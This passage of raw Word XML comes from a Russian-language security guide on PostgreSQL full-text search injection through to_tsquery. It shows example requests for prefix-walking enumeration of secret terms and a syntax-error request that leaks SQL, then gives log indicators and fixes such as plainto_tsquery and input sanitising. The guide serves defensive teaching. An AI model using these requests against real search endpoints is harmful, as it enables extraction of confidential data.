          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t>:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC9C76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=secret:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB39CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to_tsquery('english', 'secret:*')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → матчит любое слово, начинающееся с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secret_key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secret_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Эффективное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumeration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> конфиденциальных терминов в текстовом корпусе. При сочетании с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий итерирует:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE54CA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=secret_a:*    → match articles containing "secret_a*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB9B08D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=secret_b:*    → no match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B6F901" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=secret_c:*    → match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B3E82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019BBF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Position-by-position extraction наличия конкретных prefix-ов — alphabet-walking attack на текстовый контент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D0285" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — Syntax error → information leak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43667199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=admin%20%26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20C6C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = "admin &amp;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (admin followed by trailing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, без operand). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2076DC72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error in tsquery: "admin &amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3C993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINE 4:   ... WHERE search_vector @@ to_tsquery('english', 'admin &amp;') AND ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588BCCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                            ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C011B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP-500 с full SQL текстом и leaked input. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точка входа для error-based extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.15.4 — там показано, как через concat нагружать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любым SQL-subquery, который вернёт password или другой target).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48745C04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — обход boolean-фильтрации (читать данные, которые приложение пытается скрыть через AND-conditions). Variant B — content enumeration через prefix-walking. Variant C — error-based information leak через syntax error (полная цепочка extraction в 3.15.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAEAAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F09FE42"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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(..., '... | ...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(..., '!...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(..., '...:*')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нетипичные operators от обычного user-search endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C1D25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от одного IP — индикатор Variant C или fuzzing parser-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6CEE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</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&lt;-&gt;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 критичные signal-characters tsquery operator-языка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BA804" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL — функция, которая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсит full operator language</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Text Search Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>): *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parses and produces a tsquery value from query, which can include single tokens... operators (&amp; for AND, | for OR, ! for NOT, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for FOLLOWED BY), and parentheses."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18497B38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>намеренный design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tsquery — это полный язык, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — его парсер. Разработчик, передающий user-input в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>эквивалент `eval`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для текстового search-языка. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> защищает SQL-уровень (no quote-escape), но передаваемое значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разбирается tsquery-парсером</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608DE0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>использовать функцию, которая НЕ парсит operators</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B4FDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — treats input as plain text, ignores all operators, AND-аются все термины</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773EBDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phraseto_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же, но термины должны идти подряд (phrase search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C4C90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поддерживает Google-style syntax (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"phrase"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-exclude</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>predictable subset</w:t>
      </w:r>
      <w:r>
        <w:t>, который не позволяет syntax-error attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81EA88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Подробное сравнение и migration pattern — в 3.15.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F426B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативный путь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pre-process input до `to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273C2A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>def safe_tsquery_input(q: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFEB0CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Удалить operator-characters, оставить только слова и пробелы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED143D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cleaned = re.sub(r"[&amp;|!&lt;&gt;():*]", " ", q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23B498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Превратить пробелы в &amp; — AND по всем словам</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD3F4E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tokens = [t for t in cleaned.split() if t]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765FE0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return " &amp; ".join(tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED04044" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>это reinvention `plainto_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лучше просто использовать встроенную функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E6119" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FC13E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии с FTS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появился в PG 8.3, 2008).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57453419" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
